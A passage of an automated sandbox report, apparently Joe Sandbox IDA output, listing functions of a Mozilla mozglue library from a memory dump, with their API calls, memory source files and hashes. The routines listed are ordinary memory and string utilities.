                                                                                                      • Opcode ID: 42da9faf904e16de7c103d49ea92c9bb259dd1abd9e2be4e2b1c001f77f8cbda
                                                                                                      • Instruction ID: bfdef7a940bc685f0169541e5e0025e03f174c31ba6188af9dce9a957365e1c0
                                                                                                      • Opcode Fuzzy Hash: 42da9faf904e16de7c103d49ea92c9bb259dd1abd9e2be4e2b1c001f77f8cbda
                                                                                                      • Instruction Fuzzy Hash: F4E09276445301ABEB00BBF58D0A7117FFCF70B608F20421AAA2892361EBB0C0128A51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6CFF748B,?), ref: 6CFF75B8
                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CFF75D7
                                                                                                      • FreeLibrary.KERNEL32(?,6CFF748B,?), ref: 6CFF75EC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                      • API String ID: 145871493-3641475894
                                                                                                      • Opcode ID: 18a82e2085e5b25e288720a55ecb06fb24e8319e9a8a3e6f7d9d222881f0d1a8
                                                                                                      • Instruction ID: aef2b6d9d949d7a75b0cf2864938da1b428ab0c6924c38f112c21ebd60b1a62c
                                                                                                      • Opcode Fuzzy Hash: 18a82e2085e5b25e288720a55ecb06fb24e8319e9a8a3e6f7d9d222881f0d1a8
                                                                                                      • Instruction Fuzzy Hash: 58E092B2404301ABEB01ABE2DC4A7117EFCFB07218F104126A924D2361EBB4C0529F11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6CFF7592), ref: 6CFF7608
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CFF7627
                                                                                                      • FreeLibrary.KERNEL32(?,6CFF7592), ref: 6CFF763C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                      • API String ID: 145871493-1050664331
                                                                                                      • Opcode ID: dd4973e8c48be777e934ac8df6254b988b97da24adc6c45c9fc902a608bf62f7
                                                                                                      • Instruction ID: 8621a3b91eb19e8b47b7d0527d4195b86e6eddd0deeb4fdf0f2314c7b56ab00f
                                                                                                      • Opcode Fuzzy Hash: dd4973e8c48be777e934ac8df6254b988b97da24adc6c45c9fc902a608bf62f7
                                                                                                      • Instruction Fuzzy Hash: 7EE092B2404701ABEF016FE68C4A7157EFCF71B359F004216E929D2361E7B0C0118B15
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFFBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • memset.VCRUNTIME140(?,00000000,?,?,6CFFBE49), ref: 6CFFBEC4
                                                                                                      • RtlCaptureStackBackTrace.NTDLL ref: 6CFFBEDE
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CFFBE49), ref: 6CFFBF38
                                                                                                      • RtlReAllocateHeap.NTDLL ref: 6CFFBF83
                                                                                                      • RtlFreeHeap.NTDLL(6CFFBE49,00000000), ref: 6CFFBFA6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                      • String ID:
                                                                                                      • API String ID: 2764315370-0
                                                                                                      • Opcode ID: 5a8e3df209826972fd3d5ba6b3854a0cd6986093783cf541c13f0deffa8e7def
                                                                                                      • Instruction ID: 9b5e40bba30edb2b3317bd19d3ecb8db5d4cc670248833a5965026aaeb33ed59
                                                                                                      • Opcode Fuzzy Hash: 5a8e3df209826972fd3d5ba6b3854a0cd6986093783cf541c13f0deffa8e7def
                                                                                                      • Instruction Fuzzy Hash: B6518472A002158FF714CF69CD80B9AB7A6FF85314F298A39D52597BA4D730F9078B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?,6D00D734), ref: 6CFE8E6E
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?,6D00D734), ref: 6CFE8EBF
                                                                                                      • free.MOZGLUE(?,?,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?), ref: 6CFE8F24
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?,6D00D734), ref: 6CFE8F46
                                                                                                      • free.MOZGLUE(?,?,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?), ref: 6CFE8F7A
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?), ref: 6CFE8F8F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3061335427-0
                                                                                                      • Opcode ID: 4e89082e063b2a0f5fafe0e238a0f1af108202ca8d4db23ace9410e0037a5358
                                                                                                      • Instruction ID: 6783bd304e80b48e28c684aae369575ba1eb3a8bb63e264d0ccab78850cc2d5d
                                                                                                      • Opcode Fuzzy Hash: 4e89082e063b2a0f5fafe0e238a0f1af108202ca8d4db23ace9410e0037a5358
                                                                                                      • Instruction Fuzzy Hash: 7E51B5B1A012569FEB15DF98D8807AFB3B2FF48318F15056AD516AB740E731F904CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF94DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CF94E5A
                                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CF94E97
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF94EE9
                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CF94F02
                                                                                                      • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CF94F1E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 713647276-0
                                                                                                      • Opcode ID: 16f27bb3198af3a859fbc2348422e1c7d62f3ce0e2af6d120a13c193c0348044
                                                                                                      • Instruction ID: 47511ac3e657ede912a0b39a1620b3bcefcf6976a8528a7570dabcf4e52ccc09
                                                                                                      • Opcode Fuzzy Hash: 16f27bb3198af3a859fbc2348422e1c7d62f3ce0e2af6d120a13c193c0348044
                                                                                                      • Instruction Fuzzy Hash: D741D3726087069FEB05CF29C480A9BBBE4FF99348F108A1DF56687741D770E954CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(-00000002,?,6CFA152B,?,?,?,?,6CFA1248,?), ref: 6CFA159C
                                                                                                      • memcpy.VCRUNTIME140(00000023,?,?,?,?,6CFA152B,?,?,?,?,6CFA1248,?), ref: 6CFA15BC
                                                                                                      • moz_xmalloc.MOZGLUE(-00000001,?,6CFA152B,?,?,?,?,6CFA1248,?), ref: 6CFA15E7
                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,6CFA152B,?,?,?,?,6CFA1248,?), ref: 6CFA1606
                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CFA152B,?,?,?,?,6CFA1248,?), ref: 6CFA1637
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 733145618-0
                                                                                                      • Opcode ID: 00522033078b2f4544b7859651a9ce1b4418077b14cdec4dec5638e2ae534545
                                                                                                      • Instruction ID: 45860832b7c339144f465103b1d45b94803efb476a0c764f3691e995c7098918
                                                                                                      • Opcode Fuzzy Hash: 00522033078b2f4544b7859651a9ce1b4418077b14cdec4dec5638e2ae534545
                                                                                                      • Instruction Fuzzy Hash: 4531E872A00114CFD7188EB8D85056FB7B9AF8536472A4B2DE423DBBE4EB30D9068791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFFAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6D00E330,?,6CFBC059), ref: 6CFFAD9D
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6D00E330,?,6CFBC059), ref: 6CFFADAC
                                                                                                      • free.MOZGLUE(?,?,?,?,00000000,?,?,6D00E330,?,6CFBC059), ref: 6CFFAE01
                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,6D00E330,?,6CFBC059), ref: 6CFFAE1D
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6D00E330,?,6CFBC059), ref: 6CFFAE3D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3161513745-0
                                                                                                      • Opcode ID: f0360c04452250f937008cdca98412e18a5aee7fbdc9cf075a13d507b21c3d9e
                                                                                                      • Instruction ID: d21aad30cec338f31633f13dad725fed260ed46d6e39327e1c34249df6699ba0
                                                                                                      • Opcode Fuzzy Hash: f0360c04452250f937008cdca98412e18a5aee7fbdc9cf075a13d507b21c3d9e
                                                                                                      • Instruction Fuzzy Hash: 643152B5A003159FEB10DF768C44BABB7F8EF49614F158829E95AD7710E734D801CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6D00DCA0,?,?,?,6CFCE8B5,00000000), ref: 6CFF5F1F
                                                                                                      • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CFCE8B5,00000000), ref: 6CFF5F4B
                                                                                                      • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CFCE8B5,00000000), ref: 6CFF5F7B
                                                                                                      • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CFCE8B5,00000000), ref: 6CFF5F9F
                                                                                                      • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CFCE8B5,00000000), ref: 6CFF5FD6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1389714915-0
                                                                                                      • Opcode ID: 51c734c8e03254b14c0ea13af6af28e5595dfcfed54eb782c23ff9b18e1940f7
                                                                                                      • Instruction ID: 95cd46affc2a1feb42e95bf02d240a99aed372f936be8d0839b66c7956a7b2bd
                                                                                                      • Opcode Fuzzy Hash: 51c734c8e03254b14c0ea13af6af28e5595dfcfed54eb782c23ff9b18e1940f7
                                                                                                      • Instruction Fuzzy Hash: 1D310E347006008FE714CF69C898E2ABBF5FF89319B648558E5668B7E5C731EC42CB80
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF9B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6CF9B532
                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6CF9B55B
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CF9B56B
                                                                                                      • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CF9B57E
                                                                                                      • free.MOZGLUE(00000000), ref: 6CF9B58F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                      • String ID:
                                                                                                      • API String ID: 4244350000-0
                                                                                                      • Opcode ID: 7789dc92141d7313288198e0c1f1f0b85c36589a524a1708025e4a4246fc685e
                                                                                                      • Instruction ID: fa7747bbdd44df33f5cc1ab217b304122535f7644137ce287070d379ec934b67
                                                                                                      • Opcode Fuzzy Hash: 7789dc92141d7313288198e0c1f1f0b85c36589a524a1708025e4a4246fc685e
                                                                                                      • Instruction Fuzzy Hash: FA21E771A00205DBEF118FA9CC40BAEBBB9FF86314F284529E918DB345E776D911C7A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CFF6E78
                                                                                                        • Part of subcall function 6CFF6A10: InitializeCriticalSection.KERNEL32(6D01F618), ref: 6CFF6A68
                                                                                                        • Part of subcall function 6CFF6A10: GetCurrentProcess.KERNEL32 ref: 6CFF6A7D
                                                                                                        • Part of subcall function 6CFF6A10: GetCurrentProcess.KERNEL32 ref: 6CFF6AA1
                                                                                                        • Part of subcall function 6CFF6A10: EnterCriticalSection.KERNEL32(6D01F618), ref: 6CFF6AAE
                                                                                                        • Part of subcall function 6CFF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CFF6AE1
                                                                                                        • Part of subcall function 6CFF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CFF6B15
                                                                                                        • Part of subcall function 6CFF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CFF6B65
                                                                                                        • Part of subcall function 6CFF6A10: LeaveCriticalSection.KERNEL32(6D01F618,?,?), ref: 6CFF6B83
                                                                                                      • MozFormatCodeAddress.MOZGLUE ref: 6CFF6EC1
                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CFF6EE1
                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CFF6EED
                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CFF6EFF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                      • String ID:
                                                                                                      • API String ID: 4058739482-0
                                                                                                      • Opcode ID: 034dc4b3a70ab12b9cf3edd88a399da3892af508e2c9d851b579c71c3677070c
                                                                                                      • Instruction ID: 3190263d48391a0b6646b1502a36b8a00ceaff99622ba4d1531de7d15eec28c0
                                                                                                      • Opcode Fuzzy Hash: 034dc4b3a70ab12b9cf3edd88a399da3892af508e2c9d851b579c71c3677070c
                                                                                                      • Instruction Fuzzy Hash: A321C171A0421A8FDB00CF69D8856DE77F8EF88308F044039F81997351EB709A598F92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF76C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 6CFF76F2
                                                                                                      • moz_xmalloc.MOZGLUE(00000001), ref: 6CFF7705
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CFF7717
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CFF778F,00000000,00000000,00000000,00000000), ref: 6CFF7731
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFF7760
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538299546-0
                                                                                                      • Opcode ID: dd547cc5572f80fca8a1ada7cab2e9335fbaea745f2f7445c9e08c0d86f572c7
                                                                                                      • Instruction ID: 11c98cc26e867dbf1483c616efb629a1a9dfdd888f9e303fe49fc48a2c8ccc01
                                                                                                      • Opcode Fuzzy Hash: dd547cc5572f80fca8a1ada7cab2e9335fbaea745f2f7445c9e08c0d86f572c7
                                                                                                      • Instruction Fuzzy Hash: 8B11C4B2904215ABE710AFB6CC44BABBEE8EF46354F04442EF858E7300E771984087E2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CF93DEF), ref: 6CFD0D71
                                                                                                      • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CF93DEF), ref: 6CFD0D84
                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CF93DEF), ref: 6CFD0DAF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$Free$Alloc
                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                      • API String ID: 1852963964-2186867486
                                                                                                      • Opcode ID: 93d9039dfc7762cdaf2dc14c6f7e918bccd32c789aaf43384cb23192b7cbfa6c
                                                                                                      • Instruction ID: 1e1d7c8535e6b6e95bd92db32a13588cc1ea4e97c6806c391e0d3baa5bcd782d
                                                                                                      • Opcode Fuzzy Hash: 93d9039dfc7762cdaf2dc14c6f7e918bccd32c789aaf43384cb23192b7cbfa6c
                                                                                                      • Instruction Fuzzy Hash: 13F0E93139429427F62417E61C09F1B265DA7C2B24F398137F614DE6C4DFD0F80086A6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CFE75C4,?), ref: 6CFE762B
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CFE74D7,6CFF15FC,?,?,?), ref: 6CFE7644
